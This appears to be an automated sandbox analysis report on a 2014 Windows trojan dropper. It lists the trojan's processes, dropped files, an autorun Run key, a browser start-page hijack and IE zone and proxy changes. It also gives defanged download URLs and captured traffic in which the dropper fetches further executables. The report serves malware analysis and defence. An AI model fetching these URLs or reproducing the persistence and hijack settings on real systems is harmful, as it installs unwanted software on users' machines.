MD5: 1e4178272898d52fc98df4fd61fc19bd
SHA1: d6a7f7381599f1c2c82933067b8880241534da66
SHA256: 3c8362249fc2d6b05e2ace148c2486cf5a8c8b72239416000937be678dca8276
SSDeep: 98304:4g56I8srmfGFJLPfLFnpEpghJc5dFk6vGJDew/b7OQN yJ8kZV02gn:n5vrpFRZCpnDvGxP/bBbJ8kZC2gn
Size: 7044096 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-10-06 16:28:48
Analyzed on: WindowsXPESX SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

Google.exe:2196
vcredistx64.exe:3620
%original file name%.exe:2736
Index.exe:3872

The Trojan injects its code into the following process(es):

Setup.exe:2404
bdMiniDownloaderEG_MENAON-Mini_32_3313.exe:3740

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process Google.exe:2196 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\21.6214035581797\bdMiniDownloaderEG_MENAON-Mini_32_3313.exe (129048 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\bdMiniDownloaderEG_MENAON-Mini_32_3313[1].exe (488329 bytes)
%Documents and Settings%\%current user%\Cookies\SCIB46R7.txt (115 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\21.6214035581797\8.50130400527269.txt (406 bytes)

The process vcredistx64.exe:3620 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\29bb03690662e5ba2efc\1028\LocalizedData.xml (753 bytes)
C:\29bb03690662e5ba2efc\sqmapi.dll (2385 bytes)
C:\29bb03690662e5ba2efc\Graphics\SysReqNotMet.ico (1 bytes)
C:\29bb03690662e5ba2efc\1049\SetupResources.dll (17 bytes)
C:\29bb03690662e5ba2efc\3082\SetupResources.dll (18 bytes)
C:\29bb03690662e5ba2efc\1041\LocalizedData.xml (885 bytes)
C:\29bb03690662e5ba2efc\Graphics\Rotate4.ico (894 bytes)
C:\29bb03690662e5ba2efc\1041\SetupResources.dll (15 bytes)
C:\29bb03690662e5ba2efc\Strings.xml (14 bytes)
C:\29bb03690662e5ba2efc\1036\LocalizedData.xml (512 bytes)
C:\29bb03690662e5ba2efc\1040\SetupResources.dll (776 bytes)
C:\29bb03690662e5ba2efc\Graphics\Save.ico (1150 bytes)
C:\29bb03690662e5ba2efc\1036\eula.rtf (8 bytes)
C:\29bb03690662e5ba2efc\2052\LocalizedData.xml (403 bytes)
C:\29bb03690662e5ba2efc\1028\SetupResources.dll (13 bytes)
C:\29bb03690662e5ba2efc\Graphics\Rotate5.ico (894 bytes)
C:\29bb03690662e5ba2efc\vc_red.msi (2454 bytes)
C:\29bb03690662e5ba2efc\DisplayIcon.ico (1877 bytes)
C:\29bb03690662e5ba2efc\SetupUi.dll (4564 bytes)
C:\29bb03690662e5ba2efc\1042\eula.rtf (1061 bytes)
C:\29bb03690662e5ba2efc\1040\LocalizedData.xml (807 bytes)
C:\29bb03690662e5ba2efc\DHtmlHeader.html (16 bytes)
C:\29bb03690662e5ba2efc\Graphics\Print.ico (1 bytes)
C:\29bb03690662e5ba2efc\1042\SetupResources.dll (14 bytes)
C:\29bb03690662e5ba2efc\1036\SetupResources.dll (993 bytes)
C:\29bb03690662e5ba2efc\vc_red.cab (72837 bytes)
C:\29bb03690662e5ba2efc\header.bmp (7 bytes)
C:\29bb03690662e5ba2efc\UiInfo.xml (1675 bytes)
C:\29bb03690662e5ba2efc\3082\eula.rtf (842 bytes)
C:\29bb03690662e5ba2efc\3082\LocalizedData.xml (994 bytes)
C:\29bb03690662e5ba2efc\SetupEngine.dll (12353 bytes)
C:\29bb03690662e5ba2efc\Graphics\Rotate6.ico (894 bytes)
C:\29bb03690662e5ba2efc\Graphics\Rotate1.ico (894 bytes)
C:\29bb03690662e5ba2efc\1042\LocalizedData.xml (341 bytes)
C:\29bb03690662e5ba2efc\1049\LocalizedData.xml (592 bytes)
C:\29bb03690662e5ba2efc\Graphics\Rotate3.ico (894 bytes)
C:\29bb03690662e5ba2efc\Graphics\SysReqMet.ico (1 bytes)
C:\29bb03690662e5ba2efc\1049\eula.rtf (924 bytes)
C:\29bb03690662e5ba2efc\watermark.bmp (6023 bytes)
C:\29bb03690662e5ba2efc\SplashScreen.bmp (1049 bytes)
C:\29bb03690662e5ba2efc\$shtdwn$.req (788 bytes)
C:\29bb03690662e5ba2efc\1031\eula.rtf (789 bytes)
C:\29bb03690662e5ba2efc\Graphics\Rotate7.ico (894 bytes)
C:\29bb03690662e5ba2efc\1033\LocalizedData.xml (1023 bytes)
C:\29bb03690662e5ba2efc\1028\eula.rtf (16 bytes)
C:\29bb03690662e5ba2efc\Graphics\Setup.ico (182 bytes)
C:\29bb03690662e5ba2efc\1041\eula.rtf (358 bytes)
C:\29bb03690662e5ba2efc\1031\LocalizedData.xml (658 bytes)
C:\29bb03690662e5ba2efc\2052\eula.rtf (16 bytes)
C:\29bb03690662e5ba2efc\Graphics\warn.ico (10 bytes)
C:\29bb03690662e5ba2efc\2052\SetupResources.dll (272 bytes)
C:\29bb03690662e5ba2efc\1033\SetupResources.dll (16 bytes)
C:\29bb03690662e5ba2efc\Graphics\Rotate8.ico (894 bytes)
C:\29bb03690662e5ba2efc\1031\SetupResources.dll (140 bytes)
C:\29bb03690662e5ba2efc\Graphics\stop.ico (10 bytes)
C:\29bb03690662e5ba2efc\1033\eula.rtf (7 bytes)
C:\29bb03690662e5ba2efc\Setup.exe (932 bytes)
C:\29bb03690662e5ba2efc\1040\eula.rtf (9 bytes)
C:\29bb03690662e5ba2efc\ParameterInfo.xml (654 bytes)
C:\29bb03690662e5ba2efc\SetupUi.xsd (556 bytes)
C:\29bb03690662e5ba2efc\Graphics\Rotate2.ico (894 bytes)

The Trojan deletes the following file(s):

C:\_621609_ (0 bytes)

The process Setup.exe:2404 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Microsoft Visual C 2010 x64 Redistributable Setup_20141027_025649617.html (54118 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Setup_20141027_025641351.html (55598 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\HFIB5.tmp.html (22 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\HFIB4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\HFIB5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\HFIB6.tmp (0 bytes)

The process %original file name%.exe:2736 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\vcredistx64.exe (41656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Index.exe (9361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autB3.tmp (44680 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autB2.tmp (5641 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\autB3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autB2.tmp (0 bytes)

The process bdMiniDownloaderEG_MENAON-Mini_32_3313.exe:3740 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\temp\SparkMiniInstall.ini (176 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\package[1].xml (289 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\temp\f0a5413bf497ed577eae2a88a8b8a193.gnet.tmp (5043 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\temp\test4822FBB5_0309_420f_9DA2_FA5B8B854946\test4822FBB5_0309_420f_9DA2_FA5B8B854947.txt (10 bytes)
%Documents and Settings%\All Users\Documents\Baidu\Common\I18N\conf.db (759 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\install[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\temp\test4822FBB5_0309_420f_9DA2_FA5B8B854946\test4822FBB5_0309_420f_9DA2_FA5B8B854947.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\temp\test4822FBB5_0309_420f_9DA2_FA5B8B854946 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\install[1].txt (0 bytes)

The process Index.exe:3872 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\DA7WUGUH.txt (120 bytes)
%Documents and Settings%\%current user%\Application Data\Google\int\Updater.exe (129227 bytes)
%Documents and Settings%\%current user%\Application Data\Google\int\Google.exe (129271 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\updater[1].exe (489073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\google[1].exe (489298 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4.76808708626777\11.3678106125444.txt (239 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\desktop.ini (67 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\4.76808708626777\11.3678106125444.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4.76808708626777 (0 bytes)

Registry activity

The process Google.exe:2196 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C2 B1 2D 85 06 F2 04 45 80 56 DF 21 7B 44 89 09"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page Redirect Cache" = "http://www.babal.net/?gjj"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www.babal.net/?gjj"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Local Page" = "http://www.babal.net/?gjj"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion]
"SM_GamesID" = "80579"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Default Page URL" = "http://www.babal.net/?gjj"
"Default_Page_URL" = "http://www.babal.net/?gjj"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 46 00 00 00 01 00 00 00 00 00 00 00"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process vcredistx64.exe:3620 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "79 0B 9F 6D F8 3E 0E CD 77 4D D5 91 E1 3B C8 24"

The process Setup.exe:2404 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "46 F1 B6 BF DF 4D 51 B9 20 D3 1D 6E 39 F0 96 B8"

The process %original file name%.exe:2736 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE BC 03 28 E0 AA 8A 97 F4 8E 15 0C BB F7 2F EF"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion]
"SM_Games_pl" = "8"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"vcredistx64.exe" = "Microsoft Visual C 2010 x64 Redistributable Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"Index.exe" = "Index"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The process bdMiniDownloaderEG_MENAON-Mini_32_3313.exe:3740 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 4A 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\bdMiniDownloaderEG_MENAON-Mini_32_3313\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "25 7A 9D 17 1D C1 F1 D3 05 07 B3 A1 E3 10 8B 9A"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\bdMiniDownloaderEG_MENAON-Mini_32_3313\DEBUG]
"Trace Level"

The process Index.exe:3872 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "62 51 23 96 AE 91 70 39 CF F7 5B 83 EA 8B 85 DE"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 41 00 00 00 01 00 00 00 00 00 00 00"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Microsoft" = "%Documents and Settings%\%current user%\Application Data\Google\int\Updater.exe"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name:
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version:
File Description:
Comments:
Language: English (United States)

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://installs.cpa-install.com/ClientFiles/get/8	104.28.5.102
hxxp://installs.cpa-install.com/update/client_1/updater.exe	104.28.5.102
hxxp://installs.cpa-install.com/update/client_1/google.exe	104.28.5.102
hxxp://installs.cpa-install.com/computers/info?info=308AIY6MDL1TPIG13X6FMLOE5SEPN1P0496EUNITL33NEXOCUE30.0H0AFF000F381PCUSCE0I3OPTRYTMP4OE5TPIG1203214870345874/XP2/5.1/0&com=a&pl=8&prog_installs=	104.28.5.102
hxxp://menaon.com/downloo/bdMiniDownloaderEG_MENAON-Mini_32_3313.exe	104.28.16.108
hxxp://www.menaon.com/downloo/bdMiniDownloaderEG_MENAON-Mini_32_3313.exe	104.28.17.108

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile
ET MALWARE Possible Windows executable sent when remote host claims to send a Text File
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected

Traffic

GET /computers/info?info=308AIY6MDL1TPIG13X6FMLOE5SEPN1P0496EUNITL33NEXOCUE30.0H0AFF000F381PCUSCE0I3OPTRYTMP4OE5TPIG1203214870345874/XP2/5.1/0&com=a&pl=8&prog_installs= HTTP/1.1

User-Agent: AutoIt

Host: installs.cpa-install.com

Cache-Control: no-cache

Cookie: __cfduid=d069756c1588410b3cc3eaf86cd20415d1414389698994

HTTP/1.1 200 OK

Date: Mon, 27 Oct 2014 06:01:58 GMT

Content-Type: text/plain

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

X-Powered-By: PHP/5.3.28

Server: cloudflare-nginx

CF-RAY: 17fcae9678e906a3-EWR
196..80579.7$bdMiniDownloaderEG_MENAON-Mini_32_3313.exe$111111$hXXp://
menaon.com/downloo/bdMiniDownloaderEG_MENAON-Mini_32_3313.exe$NoUI=1 S
tart=1$Baidu Spark Browser.9$PC_Faster_Setup_Mini_E77_S.exe$111111$htt
p://download.pcfaster.baidu.com.eg/PC_Faster_Setup_Mini_E77_S.exe$/s /
NOTRAY$Baidu PC Faster.8$hao123armenona_ar.exe$111111$hXXp://VVV.menao
n.com/downloo/hao123armenona_ar.exe$ $Hao123-Client............0..

GET /ClientFiles/get/8 HTTP/1.1

User-Agent: AutoIt

Host: installs.cpa-install.com

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Mon, 27 Oct 2014 06:01:39 GMT

Content-Type: text/plain; charset=UTF-8

Content-Length: 239

Connection: keep-alive

Set-Cookie: __cfduid=d069756c1588410b3cc3eaf86cd20415d1414389698994; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.cpa-install.com; HttpOnly

Vary: Accept-Encoding

X-Powered-By: PHP/5.3.28

Server: cloudflare-nginx

CF-RAY: 17fcae22b02806a3-EWR
hXXp://installs.cpa-install.com/update/client_1/updater.exe$Updater.ex
e$@AppDataDir$\Google\int$HKEY_CURRENT_USER\Software\Microsoft\Windows
\CurrentVersion\Run$Microsoft.hXXp://installs.cpa-install.com/update/c
lient_1/google.exe$Google.exe....


GET /update/client_1/updater.exe HTTP/1.1

User-Agent: AutoIt

Host: installs.cpa-install.com

Cache-Control: no-cache

Cookie: __cfduid=d069756c1588410b3cc3eaf86cd20415d1414389698994

HTTP/1.1 200 OK

Date: Mon, 27 Oct 2014 06:01:41 GMT

Content-Type: application/octet-stream

Content-Length: 1042944

Connection: keep-alive

Last-Modified: Mon, 22 Sep 2014 20:44:31 GMT

ETag: "54208a2f-fea00"

Accept-Ranges: bytes

Server: cloudflare-nginx

CF-RAY: 17fcae32c11306a3-EWR
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........d..........
....'.a.....H.k.....H.h.....H.i......}%......}5...............~.......
k.......o.......1.......j.....Rich....................PE..L...8..T....
......"[email protected]....
... ....@...@[email protected]..|[email protected]..............
........Ll..................................0'..@...............`.....
.......................text...O........................... ..`.rdata..
B...........................@[email protected]..................@.
[email protected]..................@[email protected]......
[email protected]..........................................................
......................................................................
......................................................................
......................................................................
............................................U..V...6.......u&.E..0j.j.
.6..p.H...t..}..........^]...2...U..Q.E.Ph....j.3.PPP.u...X.H.........
[email protected]..].j....E..]....M......Q..j.X.E.......E..H....
E..A..E..A..E..A..E....M....E..A..E..A..E..A..E....E...t.....M..E..J..
..E...uU.E.P............P...~....wD.N.P...E.P.h...P......u..........3.
@.F..>.M......_^..[.....M.........F..H........U.......D.d$..SV.u.W.
F..L$..8j....^..........S..j.[......O....D$$.A..D$(.A..D$,.A..D$0...L$
$...D$..A..D$..A..D$..A..D$ .....t..L$$....M........0S...L$.......
<<< skipped >>>

GET /update/client_1/google.exe HTTP/1.1

User-Agent: AutoIt

Host: installs.cpa-install.com

Cache-Control: no-cache

Cookie: __cfduid=d069756c1588410b3cc3eaf86cd20415d1414389698994

HTTP/1.1 200 OK

Date: Mon, 27 Oct 2014 06:01:48 GMT

Content-Type: application/octet-stream

Content-Length: 1048576

Connection: keep-alive

Last-Modified: Mon, 22 Sep 2014 20:44:31 GMT

ETag: "54208a2f-100000"

Accept-Ranges: bytes

Server: cloudflare-nginx

CF-RAY: 17fcae5bc30106a3-EWR
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........d..........
....'.a.....H.k.....H.h.....H.i......}%......}5...............~.......
k.......o.......1.......j.....Rich....................PE..L...V..T....
......"..........F......t_............@..........................`....
...D....@...@[email protected]..|[email protected]..............
........Ll..................................0'..@...............`.....
.......................text...O........................... ..`.rdata..
B...........................@[email protected]..................@.
[email protected]..................@[email protected]......
[email protected]..........................................................
......................................................................
......................................................................
......................................................................
............................................U..V...6.......u&.E..0j.j.
.6..p.H...t..}..........^]...2...U..Q.E.Ph....j.3.PPP.u...X.H.........
[email protected]..].j....E..]....M......Q..j.X.E.......E..H....
E..A..E..A..E..A..E....M....E..A..E..A..E..A..E....E...t.....M..E..J..
..E...uU.E.P............P...~....wD.N.P...E.P.h...P......u..........3.
@.F..>.M......_^..[.....M.........F..H........U.......D.d$..SV.u.W.
F..L$..8j....^..........S..j.[......O....D$$.A..D$(.A..D$,.A..D$0...L$
$...D$..A..D$..A..D$..A..D$ .....t..L$$....M........0S...L$.......
<<< skipped >>>

GET /downloo/bdMiniDownloaderEG_MENAON-Mini_32_3313.exe HTTP/1.1

User-Agent: AutoIt

